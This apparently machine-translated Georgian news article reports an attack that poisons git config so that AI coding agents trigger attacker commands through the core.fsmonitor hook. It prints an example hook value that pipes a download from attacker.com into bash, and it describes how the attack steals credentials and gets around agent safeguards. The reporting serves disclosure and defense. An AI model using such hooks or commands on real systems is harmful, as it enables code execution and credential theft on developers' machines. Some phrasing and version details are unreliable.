# უსაფრთხოების მკვლევარებმა გამოავლინეს კრიტიკული Git Config მოწამვლის ხარვეზი, რომელიც შეიარაღებულია AI კოდირების აგენტების წინააღმდეგ

Source: TechNewsList (https://technewslist.com)
Canonical URL: https://technewslist.com/ka/article/git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-ka
Section: Software (https://technewslist.com/ka/software)
Author: TechNewsList
Language: ka
Published: 2026-09-19T11:30:31.785+00:00
Updated: 2026-09-19T11:30:31.987617+00:00

> core.fsmonitor hook-ებში დაუცველობა საშუალებას აძლევს მავნე საცავებს შეასრულონ თვითნებური ადგილობრივი ჭურვის ბრძანებები აგენტურ IDE-ებში პროექტის ჩატვირთვისთანავე, რაც იწვევს გადაუდებელ პატჩებს.

## TL;DR
- უსაფრთხოების მკვლევარებმა გამოავლინეს კრიტიკული დაუცველობა, რომელიც აძლიერებს git core.fsmonitor კაკვებს ავტონომიური AI კოდირების ასისტენტებთან.
- მავნე კონფიგურაციის პარამეტრები ასრულებენ თვითნებურ ლოკალურ ჭურვის ბრძანებებს იმ მომენტში, როდესაც AI აგენტი ამოწმებს არასანდო საცავს.
- შეტევა მთლიანად გვერდს უვლის LLM სწრაფი ინექციის ფილტრებს, რადგან დატვირთვის შესრულება ხდება ძირეულ ოპერაციულ სისტემაში.
- AI IDE-ის მსხვილმა მომწოდებლებმა გამოუშვეს გადაუდებელი პატჩები, ხოლო CISA-მ გამოსცა საკონსულტაციო სახელმძღვანელო მითითებები, რომლებიც ავალდებულებენ კონტეინერირებული აგენტების ქვიშის ყუთს.

## Key points
- დაუცველობა იყენებს git-ის core.fsmonitor hook მექანიზმს, რათა მიაღწიოს თვითნებური ჭურვის ბრძანების შესრულებას საცავის ინდექსირების დროს.
- ავტონომიური AI აგენტები რეგულარულად გამოიძახებენ git სტატუსს და git diff-ს ფონზე, უნებლიედ ააქტიურებენ მავნე კაუჭებს მომხმარებლის მოთხოვნის გარეშე.
- ენის მოდელის უსაფრთხოების კლასიფიკატორები არაეფექტურია ექსპლოიტის წინააღმდეგ, რადგან შესრულება ხდება OS ბავშვის პროცესის ფენაზე.
- თავდასხმის დატვირთვას შეუძლია ჩუმად ამოიღოს ღრუბლოვანი სერთიფიკატები, პირადი SSH გასაღებები და ადგილობრივი გარემოს ნიშნები დეველოპერული მანქანებიდან.
- ხელოვნური ინტელექტის განვითარების ხელსაწყოების მომწოდებლებმა განათავსეს გადაუდებელი განახლებები, რათა შეზღუდონ საცავის დონის კვალის შესრულება დაუმოწმებელ დირექტორიაში.
- Git Project ავითარებს ზედა ნაკადის პროტოკოლის განახლებებს, რათა მოითხოვოს დეველოპერის მკაფიო თანხმობა საცავში განსაზღვრული მონიტორის კაკვების შესრულებამდე.

## რა მოხდა

2026 წლის 18 სექტემბერს, კიბერუსაფრთხოების კვლევითმა გუნდებმა გამოაქვეყნეს კოორდინირებული გამჟღავნება და კონცეფციის დამადასტურებელი ექსპლოიტები, რომლებიც აჩვენებენ უსაფრთხოების კრიტიკულ ხარვეზს დეველოპერების სამუშაო პროცესებში, რაც აძლიერებს ადგილობრივ საცავის კონფიგურაციის ფაილებს ავტონომიური AI კოდირების ასისტენტების წინააღმდეგ. კლონირებულ საცავებში მავნე კონფიგურაციის გასაღებების ჩასმით, თავდამსხმელებს შეუძლიათ მიაღწიონ დაუყოვნებელ, თვითნებური დისტანციური კოდის შესრულებას მასპინძელი დეველოპერის გარემოში იმ მომენტში, როდესაც AI აგენტი ამოწმებს ან ინდექსებს პროექტის საქაღალდეს.

დაუცველობა ორიენტირებულია git კონფიგურაციის პარამეტრებსა და ავტონომიური კოდირების აგენტების მიერ ჩატარებულ ავტომატიზირებულ ფონურ ოპერაციებს შორის ურთიერთქმედებას. როდესაც ხელოვნური ინტელექტის განვითარების ინსტრუმენტები, როგორიცაა Cursor, Claude Code, GitHub Copilot Workspace, ან ადგილობრივი LLM ორკესტრატორები იკვლევენ კოდების ბაზას, ისინი რეგულარულად გამოიძახებენ ძირითადი ბრძანების ხაზის git ბრძანებებს საცავის სტატუსის, ფილიალის ტოპოლოგიისა და ფაილის მოდიფიკაციების გასაანალიზებლად.

თუმცა, საფრთხის აქტორების მიერ შექმნილ მავნე საცავებში შეიძლება შეიცავდეს მორგებულ ლოკალური კონფიგურაციის დირექტივას - კონკრეტულად მიმართული `core.fsmonitor` hook-ზე. როდესაც ხელოვნური ინტელექტის აგენტი იწყებს აღმოჩენის სტანდარტულ მოთხოვნებს, როგორიცაა `git status` ან `git diff`, git ავტომატურად გამოიძახებს ორობით ან shell სკრიპტს, რომელიც განსაზღვრულია საცავის კონფიგურაციაში ფაილის თვალთვალის მდგომარეობის განახლების მიზნით, ახორციელებს მოწინააღმდეგის თვითნებურ დატვირთვას ენობრივი მოდელის დამცავი რგოლების გარეთ და დეველოპერების ინტერვალის მოთხოვნის გარეშე.

![Gitweb საცავის ბრაუზერი აჩვენებს ჩადენის ისტორიას, ხის სტრუქტურებს და კონფიგურაციის ფაილებს](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789816503497-mz59j8-git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-inside-1-cf18596760.webp)
*წყაროს საცავის შემოწმება: ჩაშენებული საცავის კონფიგურაციის პარამეტრებს შეუძლიათ კარნახონ კლიენტის მხარის ხელსაწყოს ქცევა.*

## რატომ არის მნიშვნელოვანი

გამჟღავნება ხაზს უსვამს ფუნდამენტურ არქიტექტურულ ბრმა წერტილს თანამედროვე პროგრამული უზრუნველყოფის მიწოდების ჯაჭვში: ნდობის საზღვარი ავტონომიურ AI აგენტებსა და ადგილობრივი ფაილური სისტემის კონფიგურაციის მეტამონაცემებს შორის. დეველოპერების უსაფრთხოების ტრადიციული ტრენინგი ხაზს უსვამს სიფრთხილეს უცნობი shell სკრიპტების ან ბინარების შესრულებამდე, მაგრამ დეველოპერები რეგულარულად ახდენენ მესამე მხარის საცავების კლონირებას და სთხოვენ ხელოვნური ინტელექტის ასისტენტებს აუდიტით, გადახედონ ან შეცვალონ კოდი იმ ვარაუდით, რომ აგენტი მუშაობს დაცვით სავარჯიშოში.

იმის გამო, რომ ექსპლოიტი იწვევს ოპერაციული სისტემის პროცესის გამოძახების ფენას და არა მოდელის გენერირების გზით, სტანდარტული სწრაფი ინექციის შერბილება, სისტემის სწრაფი დირექტივები და მოდელის უსაფრთხოების კლასიფიკატორები სრულიად ინერტული ხდება. ხელოვნური ინტელექტის აგენტი არასოდეს იღებს მავნე ინსტრუქციას ბუნებრივი ენის ტექსტად; ამის ნაცვლად, ძირითადი git ორობითი შესრულება აგენტის გაშვების ქვეშ ააქტიურებს დატვირთვას პირდაპირ მასპინძელ გარსზე.

ავტონომიური კოდირების ხელსაწყოების ფართო ინტეგრაციის გათვალისწინებით კორპორატიულ საინჟინრო განყოფილებებში, ღია კოდის შემსრულებლებსა და უსაფრთხოების აუდიტის გუნდებში, შეიარაღებული კონფიგურაციის საცავი წარმოადგენს ასიმეტრიულ შეტევის ვექტორს. მავნე ამოღების მოთხოვნას, კლონირებულ აუდიტის სამიზნეს ან მოწამლულ დამოკიდებულების ჩანგალს შეუძლია ფარულად ამოიღოს ღრუბლის სერთიფიკატები, პირადი SSH კლავიშები და გარემოს ცვლადები, სანამ ინჟინერი ან AI ასისტენტი წაიკითხავს აპლიკაციის წყაროს კოდის ერთ ხაზს.

## ტექნიკური დეტალები

root მექანიზმი ეყრდნობა git-ის ჩაშენებულ ფაილური სისტემის მონიტორის შესაძლებლობას. core.fsmonitor, რომელიც დანერგილია სტატუსის გამოთვლების დასაჩქარებლად მასიური კოდის საცავებში, რომლებიც შეიცავს ასობით ათას ფაილს, საშუალებას აძლევს დეველოპერებს განსაზღვრონ გარე დემონი ან ჰუკ სკრიპტი, რომელიც აცნობებს git-ს, რომელი ფაილები შეიცვალა ბოლო მოთხოვნის შემდეგ.

სტანდარტული git ოპერაციებში, საცავის დონის კონფიგურაცია, რომელიც მდებარეობს `.git/config`-ში, უპირატესობას ანიჭებს მომხმარებლის გლობალური კონფიგურაციის პარამეტრებს (`~/.gitconfig`). როდესაც თავდამსხმელი ამზადებს ექსპლოიტის საცავს, ისინი ავრცელებენ კონფიგურაციის დატვირთვას ან ქვემოდულის კონფიგურაციების, ჩაშენებული შაბლონების მეშვეობით, ან დეველოპერებისა და ავტომატიზებული მილსადენების მოტყუებით საცავის სპეციფიკური კონფიგურაციის მნიშვნელობების სინქრონიზაციაში. როდესაც `core.fsmonitor` კონფიგურირებულია ბრძანების სტრიქონით, როგორიცაა `sh -c 'curl -s https://attacker.com/payload | bash'', git-ის ნებისმიერი გამოძახება, რომელიც ამოწმებს სამუშაო ხის სისუფთავეს, ააქტიურებს Hook სკრიპტს სინქრონულად.

![Linux-ის ბრძანების ხაზის ტერმინალი მუშაობს bash shell სესიისა და ფონის პროცესის ბრძანებებს](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789816505799-gj8oki-git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-inside-2-140f4ef7d5.webp)
*შესრულების გარემო: არასანდო კაუჭის გამოძახებები გაურბის სავარჯიშო შეზღუდვებს პირდაპირ მასპინძელი დეველოპერის ტერმინალებზე.*

ხელოვნური ინტელექტის კოდირების აგენტები ცალსახად დაუცველები არიან ამ გამომწვევი ნიმუშის მიმართ, რადგან მათი შემეცნებითი მარყუჟები ეყრდნობა ხშირ, ავტონომიურ სტატუსს. რეალურ დროში კონტექსტის შესანარჩუნებლად და ფაილების რედაქტირების დასადასტურებლად, ხელოვნური ინტელექტის ორკესტრატორები რეგულარულად აწარმოებენ უთავო git ბავშვის პროცესებს ფონზე. იმის გამო, რომ ეს ქვეშელური ბრძანებები მემკვიდრეობით იღებენ მომხმარებლის ინტერაქტიულ ნებართვებს, მავნე მონიტორის კაუჭი სრულდება დეველოპერის სრული პრივილეგიების ნაკრებით, გვერდის ავლით ტერმინალის დამტკიცების მოთხოვნებს.

## გავლენა ბაზარზე და ინდუსტრიაზე

დაუცველობის გამჟღავნებამ გამოიწვია სასწრაფო რეაგირების კოორდინაცია დეველოპერის ხელსაწყოების ინდუსტრიაში. ძირითადი ხელოვნური ინტელექტის მქონე IDE-ების და ტერმინალის ასისტენტების შემსრულებლებმა, მათ შორის Cursor-მა, Anthropic-მა და Microsoft-მა, გამოუშვეს სწრაფი გადაწყვეტილებები პარასკევს საღამოს, რათა განეხორციელებინათ პროცესის მკაცრი იზოლაცია და გამორთოთ ადგილობრივი საცავის დონის hook შესრულება.

აშშ-ის კიბერუსაფრთხოების და ინფრასტრუქტურის უსაფრთხოების სააგენტომ (CISA) გამოსცა ოპერატიული კიბერთავდაცვის კონსულტაცია, რომელიც მოუწოდებს საწარმოთა პროგრამული უზრუნველყოფის ორგანიზაციებს განახორციელონ ორგანიზაციული git კონფიგურაციის გამკვრივება. საწარმოთა უსაფრთხოების გუნდები აქტიურად ახორციელებენ გლობალური კონფიგურაციის უგულებელყოფას, რომელიც ადგენს `GIT_CONFIG_NOSYSTEM=1` და ახორციელებს `safe.directory` შეზღუდვებს, რაც ხელს უშლის ფონური სერვისების მიერ წარმოქმნილი git პროცესების ჩატვირთვას არათეთრ სიაში.

ინციდენტი აჩქარებს ინდუსტრიის მასშტაბით გადასვლას კონტეინერულ და ვირტუალიზებულ აგენტების მუშაობის დროზე. საწარმოთა ინჟინერიის ლიდერები სულ უფრო მეტად ავალდებულებენ, რომ AI კოდირების ასისტენტები მუშაობდნენ ექსკლუზიურად იზოლირებულ Docker კონტეინერებში, MicroVM-ებში ან გამაგრებულ ღრუბლოვან დეველბოქსებში, სადაც ფაილური სისტემის კაუჭები და ქსელის გამოსვლა ვერ აღწევს ადგილობრივ დეველოპერების სერთიფიკატებს ან კორპორატიული წარმოების ქსელებს.

## რას უნდა დავაკვირდეთ შემდეგ

ღია კოდის Git Project ახორციელებს Git 2.47-ის ზემორეული პროტოკოლის გაფართოებას, რომელიც ოფიციალურად ზღუდავს ადგილობრივ საცავის კონფიგურაციებში მითითებულ შესრულებად კაუჭებს, თუ ცალსახად არ არის დადასტურებული კრიპტოგრაფიული ხელმოწერების ან ინტერაქტიული მომხმარებლის თანხმობის მოთხოვნის მეშვეობით. ეს არქიტექტურული მოდიფიკაცია სამუდამოდ დახურავს კონფიგურაციის შესრულების გზას ყველა ქვემოთ მოყვანილ კლიენტზე.

უსაფრთხოების აუდიტორული ფირმები ავითარებენ ავტომატიზირებულ ინსტრუმენტებს საჯარო საცავებისა და პაკეტების რეესტრების სკანირებისთვის საეჭვო კონფიგურაციის ფაილებისთვის და დამალული კაკვებისთვის, სანამ საცავი ინდექსირებული იქნება ღრუბლის დეველოპერების ან AI აგენტების მიერ. OpenSSF ასევე ამზადებს ოფიციალურ ოპერაციულ მითითებებს ავტონომიური დეველოპერის აგენტებისთვის, განსაზღვრავს უსაფრთხოების მინიმალური საზღვრებს ავტონომიური ფაილური სისტემის მანიპულირებისთვის.

ორგანიზაციებმა, რომლებიც იყენებენ AI კოდირების ხელსაწყოებს, დაუყოვნებლივ უნდა აუდიტირონ აქტიური დეველოპერების სამუშაო სადგურებს, განაახლონ თავიანთი IDE გაფართოებები უახლეს შესწორებულ ნაგებობებზე და დაადასტურონ, რომ აგენტების ავტომატიზებული პერსპექტივები ასრულებენ მიკროსეგმენტურ ქვიშის ყუთებს.

## წყაროები

- [Git Core დოკუმენტაციისა და უსაფრთხოების სამუშაო ჯგუფი](https://git-scm.com/docs/git-config)— ტექნიკური დოკუმენტაცია core.fsmonitor Hook-ის შესრულების პარამეტრებზე და საკონსულტაციო მითითებები არასანდო ლოკალური საცავის კონფიგურაციების შესახებ.

- [BleepingComputer კიბერუსაფრთხოების სიახლეები](https://www.bleepingcomputer.com/news/security/malicious-git-configs-exploit-fsmonitor-to-hijack-ai-coding-agents/)- თავდასხმის ვექტორების ანალიზი, რომლებიც აძლიერებენ საცავის კლონების დირექტორიას, რათა მიაღწიონ სტელსი ჭურვის შესრულებას დეველოპერის სამუშაო სადგურებზე.

- [Hacker News Vulnerability Desk](https://thehackernews.com/2026/09/critical-git-core-fsmonitor-flaw-in-ai-coding-agents.html)— გამყიდველის პატჩის გამოშვებების გაშუქება წამყვანი AI IDE და ტერმინალის კოდირების ასისტენტის განვითარების გუნდებიდან.

- [CISA კიბერ თავდაცვის მრჩეველი](https://www.cisa.gov/news-events/alerts/2026/09/18/malicious-git-configuration-exploitation)— ფედერალური უსაფრთხოების სახელმძღვანელო მითითებები, რომლებიც ხელმძღვანელობენ განვითარების ორგანიზაციებს, განახორციელონ გლობალური კონფიგურაციის საკეტები და იზოლირება AI ინსტრუმენტის პროცესების გარემოში.

Mentions: Git პროექტი, კლოდ კოდი, კურსორი, კიბერუსაფრთხოების და ინფრასტრუქტურის უსაფრთხოების სააგენტო, CISA

## Sources
- [Git Core დოკუმენტაციისა და უსაფრთხოების სამუშაო ჯგუფი](https://git-scm.com/docs/git-config)
- [BleepingComputer კიბერუსაფრთხოების სიახლეები](https://www.bleepingcomputer.com/news/security/malicious-git-configs-exploit-fsmonitor-to-hijack-ai-coding-agents/)
- [Hacker News Vulnerability Desk](https://thehackernews.com/2026/09/critical-git-core-fsmonitor-flaw-in-ai-coding-agents.html)
- [CISA კიბერ თავდაცვის მრჩეველი](https://www.cisa.gov/news-events/alerts/2026/09/18/malicious-git-configuration-exploitation)